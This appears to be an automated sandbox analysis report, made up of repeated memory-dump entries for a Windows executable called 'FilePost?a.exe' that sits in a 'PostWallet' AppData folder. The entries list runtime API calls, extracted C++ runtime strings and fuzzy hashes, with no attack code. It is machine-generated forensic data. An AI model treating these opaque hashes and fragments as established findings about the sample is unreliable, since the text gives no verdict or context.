                                          Memory Dump Source
                                          • Source File: 00000003.00000002.4089780985.000000006D141000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6D140000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_6d140000_FilePost?a.jbxd
                                          Similarity
                                          • API ID: __cftoe
                                          • String ID: StringNarrow: wcstombs_s() failed with error
                                          • API String ID: 4189289331-2706627336
                                          • Opcode ID: dec5ab54103536dc45d18e51127312af9999720b2f99f8e0a1ce793dcdc6ed67
                                          • Instruction ID: f41e12fc4ae8b9d324583c7e697d14f219f779cdd65ede8854d430595ec73da6
                                          • Opcode Fuzzy Hash: dec5ab54103536dc45d18e51127312af9999720b2f99f8e0a1ce793dcdc6ed67
                                          • Instruction Fuzzy Hash: AE81E1709043499FEB20CFA8C854BEEBBF9FF04304F14465DD585A7689D7B4AA84CBA1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • __startOneArgErrorHandling.LIBCMT ref: 6D17885D
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.4089780985.000000006D141000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6D140000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_6d140000_FilePost?a.jbxd
                                          Similarity
                                          • API ID: ErrorHandling__start
                                          • String ID: pow
                                          • API String ID: 3213639722-2276729525
                                          • Opcode ID: 78df0f38cfae0c72e2736c01d09dfe833c7786fef2f435b38fa34031b3ad6edd
                                          • Instruction ID: 4dadd0a73dc3ed84da4ac612afe39376ef95db33a12bb954dc0271eeeea00a1f
                                          • Opcode Fuzzy Hash: 78df0f38cfae0c72e2736c01d09dfe833c7786fef2f435b38fa34031b3ad6edd
                                          • Instruction Fuzzy Hash: 92518CA1B1C10387C712EA18D9013BA3BB0EB91751F288D59E4D5C62EEEBF484928F46
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • ___std_exception_copy.LIBVCRUNTIME ref: 6D1430C2
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.4089780985.000000006D141000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6D140000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_6d140000_FilePost?a.jbxd
                                          Similarity
                                          • API ID: ___std_exception_copy
                                          • String ID: " not used$AlgorithmParametersBase: parameter "
                                          • API String ID: 2659868963-612349224
                                          • Opcode ID: 1f9ccb5509fdef0b6fc2c74a87e404dd7d328543d913ed2aa491c35598f8b9f6
                                          • Instruction ID: 241da2eccefb1ae70c82b630c82dd1f412827eb93968c7025f6757edccccc728
                                          • Opcode Fuzzy Hash: 1f9ccb5509fdef0b6fc2c74a87e404dd7d328543d913ed2aa491c35598f8b9f6
                                          • Instruction Fuzzy Hash: 2A51D171904649AFCB10DFA4C800BAAFBF9EF09714F10865FE925D7A85E7F5A540CB90
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • ___except_validate_context_record.LIBVCRUNTIME ref: 6D169C1F
                                          • __IsNonwritableInCurrentImage.LIBCMT ref: 6D169CD3
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.4089780985.000000006D141000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6D140000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_6d140000_FilePost?a.jbxd
                                          Similarity
                                          • API ID: CurrentImageNonwritable___except_validate_context_record
                                          • String ID: csm
                                          • API String ID: 3480331319-1018135373
                                          • Opcode ID: 6ca78c216f6fa19449cfee5d3b0becb0970905e95978c437c373f199569ea1b7
                                          • Instruction ID: 91db3e36f4b20f0dacc7d9ad5b5b337861a2fc011e1f3df5d69067f2cdc681fd
                                          • Opcode Fuzzy Hash: 6ca78c216f6fa19449cfee5d3b0becb0970905e95978c437c373f199569ea1b7
                                          • Instruction Fuzzy Hash: DC41D230A042499BCF10CF68D890AAEBBF5FF55328F018095ED249B359D7B5DA21CBA0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • ___std_exception_copy.LIBVCRUNTIME ref: 6D14A6A2
                                          Strings
                                          • Cryptographic algorithms are disabled after a power-up self test failed., xrefs: 6D14A622
                                          • Cryptographic algorithms are disabled before the power-up self tests are performed., xrefs: 6D14A5F4
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.4089780985.000000006D141000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6D140000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_6d140000_FilePost?a.jbxd
                                          Similarity
                                          • API ID: ___std_exception_copy
                                          • String ID: Cryptographic algorithms are disabled after a power-up self test failed.$Cryptographic algorithms are disabled before the power-up self tests are performed.
                                          • API String ID: 2659868963-3345525433
                                          • Opcode ID: 7be429c1e28a95755db8cf39a2c4d1165ca79a0532eb29f5d580396c602cfd82
                                          • Instruction ID: f7b5eaf8c237bfecbc39d6c5eaeba51a725fced1b2323647f34c9b8b8d0a296a
                                          • Opcode Fuzzy Hash: 7be429c1e28a95755db8cf39a2c4d1165ca79a0532eb29f5d580396c602cfd82
                                          • Instruction Fuzzy Hash: DE41C6B1808649AFC710CFA4C944FEEF7B8FF14618F11862AE911E7645EBB4A554CBA0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.4089780985.000000006D141000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6D140000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_6d140000_FilePost?a.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: C:\Users\user\AppData\Local\PostWallet\app-1.0.0\FilePost?a.exe
                                          • API String ID: 0-1657534680
                                          • Opcode ID: 1260ecea97a636c6f658471781a14b074789d1f38ec2280f1360b2d9c0475efd
                                          • Instruction ID: 8884e9abe2206443d2f60e8be8f8e9b5e44e6e0260e5ca4c6582ef84939a8c59
                                          • Opcode Fuzzy Hash: 1260ecea97a636c6f658471781a14b074789d1f38ec2280f1360b2d9c0475efd
                                          • Instruction Fuzzy Hash: 29410771A44215AFCB31DFA9D890EAEBBF8FF8A710F110066E614D7264D7F08A45CB51
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • DName::DName.LIBVCRUNTIME ref: 6E39D9CC
                                            • Part of subcall function 6E39BEF3: DName::DName.LIBVCRUNTIME ref: 6E39BF6B
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.4090123823.000000006E391000.00000020.00000001.01000000.00000009.sdmp, Offset: 6E390000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_6e390000_FilePost?a.jbxd
                                          Similarity
                                          • API ID: NameName::
                                          • String ID: Y9n$9n
                                          • API String ID: 1333004437-4080032062
                                          • Opcode ID: e3058c604b294b38ed0dfe32680511263dd8fc82bcc2cf3a70111bc97d7be708
                                          • Instruction ID: da7075e7c8174d111531564f661428456e4484676ac40ad42660e01341b627f6
                                          • Opcode Fuzzy Hash: e3058c604b294b38ed0dfe32680511263dd8fc82bcc2cf3a70111bc97d7be708
                                          • Instruction Fuzzy Hash: 924199B4D046089FDF05DFACC482BEDBBB9BB46314F644199D495A7290E7709A88CF40
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • EncodePointer.KERNEL32(00000000,?,00000000,1FFFFFFF), ref: 6D16BBD8
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.4089780985.000000006D141000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6D140000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_6d140000_FilePost?a.jbxd
                                          Similarity
                                          • API ID: EncodePointer
                                          • String ID: MOC$RCC
                                          • API String ID: 2118026453-2084237596
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • DName::DName.LIBVCRUNTIME ref: 6E39CE9D
                                            • Part of subcall function 6E398B63: shared_ptr.LIBCMT ref: 6E398B7F
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.4090123823.000000006E391000.00000020.00000001.01000000.00000009.sdmp, Offset: 6E390000, based on PE: true
                                          • Associated: 00000003.00000002.4090095751.000000006E390000.00000002.00000001.01000000.00000009.sdmp
                                          • Associated: 00000003.00000002.4090184684.000000006E3A1000.00000004.00000001.01000000.00000009.sdmp
                                          • Associated: 00000003.00000002.4090211589.000000006E3A2000.00000002.00000001.01000000.00000009.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_6e390000_FilePost?a.jbxd
                                          Similarity
                                          • API ID: NameName::shared_ptr
                                          • String ID: amp$cpu
                                          • API String ID: 2125921051-2542064945
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                            • Part of subcall function 6E39AF9A: __EH_prolog3.LIBCMT ref: 6E39AFA1
                                          • DName::operator+.LIBCMT ref: 6E39EAE9
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.4090123823.000000006E391000.00000020.00000001.01000000.00000009.sdmp, Offset: 6E390000, based on PE: true
                                          • Associated: 00000003.00000002.4090095751.000000006E390000.00000002.00000001.01000000.00000009.sdmp
                                          • Associated: 00000003.00000002.4090184684.000000006E3A1000.00000004.00000001.01000000.00000009.sdmp
                                          • Associated: 00000003.00000002.4090211589.000000006E3A2000.00000002.00000001.01000000.00000009.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_6e390000_FilePost?a.jbxd
                                          Similarity
                                          • API ID: H_prolog3Name::operator+
                                          • String ID: CV: $Y9n
                                          • API String ID: 955633245-1151399619
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.4089780985.000000006D141000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6D140000, based on PE: true
                                          • Associated: 00000003.00000002.4089735216.000000006D140000.00000002.00000001.01000000.0000000A.sdmp
                                          • Associated: 00000003.00000002.4089846975.000000006D18F000.00000002.00000001.01000000.0000000A.sdmp
                                          • Associated: 00000003.00000002.4089846975.000000006D1AA000.00000002.00000001.01000000.0000000A.sdmp
                                          • Associated: 00000003.00000002.4089930774.000000006D1C7000.00000004.00000001.01000000.0000000A.sdmp
                                          • Associated: 00000003.00000002.4089961146.000000006D1C8000.00000008.00000001.01000000.0000000A.sdmp
                                          • Associated: 00000003.00000002.4089992246.000000006D1C9000.00000004.00000001.01000000.0000000A.sdmp
                                          • Associated: 00000003.00000002.4089992246.000000006D1CB000.00000004.00000001.01000000.0000000A.sdmp
                                          • Associated: 00000003.00000002.4090063248.000000006D1CC000.00000002.00000001.01000000.0000000A.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_6d140000_FilePost?a.jbxd
                                          Similarity
                                          • API ID: Offset
                                          • String ID: Bad dynamic_cast!
                                          • API String ID: 1587990502-2956939130
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.4089780985.000000006D141000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6D140000, based on PE: true
                                          • Associated: 00000003.00000002.4089735216.000000006D140000.00000002.00000001.01000000.0000000A.sdmp
                                          • Associated: 00000003.00000002.4089846975.000000006D18F000.00000002.00000001.01000000.0000000A.sdmp
                                          • Associated: 00000003.00000002.4089846975.000000006D1AA000.00000002.00000001.01000000.0000000A.sdmp
                                          • Associated: 00000003.00000002.4089930774.000000006D1C7000.00000004.00000001.01000000.0000000A.sdmp
                                          • Associated: 00000003.00000002.4089961146.000000006D1C8000.00000008.00000001.01000000.0000000A.sdmp
                                          • Associated: 00000003.00000002.4089992246.000000006D1C9000.00000004.00000001.01000000.0000000A.sdmp
                                          • Associated: 00000003.00000002.4089992246.000000006D1CB000.00000004.00000001.01000000.0000000A.sdmp
                                          • Associated: 00000003.00000002.4090063248.000000006D1CC000.00000002.00000001.01000000.0000000A.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_6d140000_FilePost?a.jbxd
                                          Similarity
                                          • API ID: NameName::
                                          • String ID: A
                                          • API String ID: 1333004437-3554254475
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.4090123823.000000006E391000.00000020.00000001.01000000.00000009.sdmp, Offset: 6E390000, based on PE: true
                                          • Associated: 00000003.00000002.4090095751.000000006E390000.00000002.00000001.01000000.00000009.sdmp
                                          • Associated: 00000003.00000002.4090184684.000000006E3A1000.00000004.00000001.01000000.00000009.sdmp
                                          • Associated: 00000003.00000002.4090211589.000000006E3A2000.00000002.00000001.01000000.00000009.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_6e390000_FilePost?a.jbxd
                                          Similarity
                                          • API ID: NameName::
                                          • String ID: A
                                          • API String ID: 1333004437-3554254475
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.4090123823.000000006E391000.00000020.00000001.01000000.00000009.sdmp, Offset: 6E390000, based on PE: true
                                          • Associated: 00000003.00000002.4090095751.000000006E390000.00000002.00000001.01000000.00000009.sdmp
                                          • Associated: 00000003.00000002.4090184684.000000006E3A1000.00000004.00000001.01000000.00000009.sdmp
                                          • Associated: 00000003.00000002.4090211589.000000006E3A2000.00000002.00000001.01000000.00000009.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_6e390000_FilePost?a.jbxd
                                          Similarity
                                          • API ID: NameName::Name::operator+=
                                          • String ID: void
                                          • API String ID: 2247604192-3531332078
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • IsProcessorFeaturePresent.KERNEL32(00000017), ref: 6E39F85B
                                          • ___raise_securityfailure.LIBCMT ref: 6E39F943
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.4090123823.000000006E391000.00000020.00000001.01000000.00000009.sdmp, Offset: 6E390000, based on PE: true
                                          • Associated: 00000003.00000002.4090095751.000000006E390000.00000002.00000001.01000000.00000009.sdmp
                                          • Associated: 00000003.00000002.4090184684.000000006E3A1000.00000004.00000001.01000000.00000009.sdmp
                                          • Associated: 00000003.00000002.4090211589.000000006E3A2000.00000002.00000001.01000000.00000009.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_6e390000_FilePost?a.jbxd
                                          Similarity
                                          • API ID: FeaturePresentProcessor___raise_securityfailure
                                          • String ID: |+uyo
                                          • API String ID: 3761405300-4244227617
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • ___swprintf_l.LIBCMT ref: 6E398647
                                          • swprintf.LIBCMT ref: 6E39866A
                                            • Part of subcall function 6E39ED07: __vswprintf_s_l.MSPDB140-MSVCRT ref: 6E39ED19
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.4090123823.000000006E391000.00000020.00000001.01000000.00000009.sdmp, Offset: 6E390000, based on PE: true
                                          • Associated: 00000003.00000002.4090095751.000000006E390000.00000002.00000001.01000000.00000009.sdmp
                                          • Associated: 00000003.00000002.4090184684.000000006E3A1000.00000004.00000001.01000000.00000009.sdmp
                                          • Associated: 00000003.00000002.4090211589.000000006E3A2000.00000002.00000001.01000000.00000009.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_6e390000_FilePost?a.jbxd
                                          Similarity
                                          • API ID: ___swprintf_l__vswprintf_s_lswprintf
                                          • String ID: %lf
                                          • API String ID: 391901838-2891890143
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • ___swprintf_l.LIBCMT ref: 6E3986A3
                                          • swprintf.LIBCMT ref: 6E3986C6
                                            • Part of subcall function 6E39ED07: __vswprintf_s_l.MSPDB140-MSVCRT ref: 6E39ED19
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.4090123823.000000006E391000.00000020.00000001.01000000.00000009.sdmp, Offset: 6E390000, based on PE: true
                                          • Associated: 00000003.00000002.4090095751.000000006E390000.00000002.00000001.01000000.00000009.sdmp
                                          • Associated: 00000003.00000002.4090184684.000000006E3A1000.00000004.00000001.01000000.00000009.sdmp
                                          • Associated: 00000003.00000002.4090211589.000000006E3A2000.00000002.00000001.01000000.00000009.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_6e390000_FilePost?a.jbxd
                                          Similarity
                                          • API ID: ___swprintf_l__vswprintf_s_lswprintf
                                          • String ID: %lf
                                          • API String ID: 391901838-2891890143
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • std::_Xinvalid_argument.LIBCPMT ref: 6D1414F5
                                            • Part of subcall function 6D1666AC: std::invalid_argument::invalid_argument.LIBCONCRT ref: 6D1666B8
                                          • ___std_exception_copy.LIBVCRUNTIME ref: 6D14151E
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.4089780985.000000006D141000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6D140000, based on PE: true
                                          • Associated: 00000003.00000002.4089735216.000000006D140000.00000002.00000001.01000000.0000000A.sdmp
                                          • Associated: 00000003.00000002.4089846975.000000006D18F000.00000002.00000001.01000000.0000000A.sdmp
                                          • Associated: 00000003.00000002.4089846975.000000006D1AA000.00000002.00000001.01000000.0000000A.sdmp
                                          • Associated: 00000003.00000002.4089930774.000000006D1C7000.00000004.00000001.01000000.0000000A.sdmp
                                          • Associated: 00000003.00000002.4089961146.000000006D1C8000.00000008.00000001.01000000.0000000A.sdmp
                                          • Associated: 00000003.00000002.4089992246.000000006D1C9000.00000004.00000001.01000000.0000000A.sdmp
                                          • Associated: 00000003.00000002.4089992246.000000006D1CB000.00000004.00000001.01000000.0000000A.sdmp
                                          • Associated: 00000003.00000002.4090063248.000000006D1CC000.00000002.00000001.01000000.0000000A.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_6d140000_FilePost?a.jbxd
                                          Similarity
                                          • API ID: Xinvalid_argument___std_exception_copystd::_std::invalid_argument::invalid_argument
                                          • String ID: string too long
                                          • API String ID: 1846318660-2556327735
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,??_C,00000004,?,6E39DA60,00000000,00000000,?,00000000), ref: 6E39D64B
                                          • DName::DName.LIBVCRUNTIME ref: 6E39D674
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.4090123823.000000006E391000.00000020.00000001.01000000.00000009.sdmp, Offset: 6E390000, based on PE: true
                                          • Associated: 00000003.00000002.4090095751.000000006E390000.00000002.00000001.01000000.00000009.sdmp
                                          • Associated: 00000003.00000002.4090184684.000000006E3A1000.00000004.00000001.01000000.00000009.sdmp
                                          • Associated: 00000003.00000002.4090211589.000000006E3A2000.00000002.00000001.01000000.00000009.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_6e390000_FilePost?a.jbxd
                                          Similarity
                                          • API ID: NameName::strncmp
                                          • String ID: ??_C
                                          • API String ID: 3707088317-1959642359
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • std::__non_rtti_object::__construct_from_string_literal.LIBVCRUNTIME ref: 6E397B26
                                          • _CxxThrowException.VCRUNTIME140(?,6E39FC88), ref: 6E397B4D
                                            • Part of subcall function 6E397E10: RaiseException.KERNEL32(E06D7363,00000001,00000003,R{9n,?,?,?,?,6E397B52,?,6E39FC88), ref: 6E397E70
                                          Strings
                                          • Access violation - no RTTI data!, xrefs: 6E397B1D
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.4090123823.000000006E391000.00000020.00000001.01000000.00000009.sdmp, Offset: 6E390000, based on PE: true
                                          • Associated: 00000003.00000002.4090095751.000000006E390000.00000002.00000001.01000000.00000009.sdmp
                                          • Associated: 00000003.00000002.4090184684.000000006E3A1000.00000004.00000001.01000000.00000009.sdmp
                                          • Associated: 00000003.00000002.4090211589.000000006E3A2000.00000002.00000001.01000000.00000009.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_6e390000_FilePost?a.jbxd
                                          Similarity
                                          • API ID: Exception$RaiseThrowstd::__non_rtti_object::__construct_from_string_literal
                                          • String ID: Access violation - no RTTI data!
                                          • API String ID: 2197136450-2158758863
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • std::__non_rtti_object::__construct_from_string_literal.LIBVCRUNTIME ref: 6E397BA3
                                          • _CxxThrowException.VCRUNTIME140(6E39FBD8,6E39FC6C,6E39FBD8,00000014,?,6E39FC88), ref: 6E397BE7
                                            • Part of subcall function 6E397E10: RaiseException.KERNEL32(E06D7363,00000001,00000003,R{9n,?,?,?,?,6E397B52,?,6E39FC88), ref: 6E397E70
                                          Strings
                                          • Access violation - no RTTI data!, xrefs: 6E397BC7
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.4090123823.000000006E391000.00000020.00000001.01000000.00000009.sdmp, Offset: 6E390000, based on PE: true
                                          • Associated: 00000003.00000002.4090095751.000000006E390000.00000002.00000001.01000000.00000009.sdmp
                                          • Associated: 00000003.00000002.4090184684.000000006E3A1000.00000004.00000001.01000000.00000009.sdmp
                                          • Associated: 00000003.00000002.4090211589.000000006E3A2000.00000002.00000001.01000000.00000009.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_6e390000_FilePost?a.jbxd
                                          Similarity
                                          • API ID: Exception$RaiseThrowstd::__non_rtti_object::__construct_from_string_literal
                                          • String ID: Access violation - no RTTI data!
                                          • API String ID: 2197136450-2158758863
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • std::__non_rtti_object::__construct_from_string_literal.LIBVCRUNTIME ref: 6E397A4A
                                          • _CxxThrowException.VCRUNTIME140(?,6E39FC14), ref: 6E397A5A
                                            • Part of subcall function 6E397E10: RaiseException.KERNEL32(E06D7363,00000001,00000003,R{9n,?,?,?,?,6E397B52,?,6E39FC88), ref: 6E397E70
                                          Strings
                                          • Access violation - no RTTI data!, xrefs: 6E397A41
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.4090123823.000000006E391000.00000020.00000001.01000000.00000009.sdmp, Offset: 6E390000, based on PE: true
                                          • Associated: 00000003.00000002.4090095751.000000006E390000.00000002.00000001.01000000.00000009.sdmp
                                          • Associated: 00000003.00000002.4090184684.000000006E3A1000.00000004.00000001.01000000.00000009.sdmp
                                          • Associated: 00000003.00000002.4090211589.000000006E3A2000.00000002.00000001.01000000.00000009.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_6e390000_FilePost?a.jbxd
                                          Similarity
                                          • API ID: Exception$RaiseThrowstd::__non_rtti_object::__construct_from_string_literal
                                          • String ID: Access violation - no RTTI data!
                                          • API String ID: 2197136450-2158758863
                                          Uniqueness

                                          Uniqueness Score: -1.00%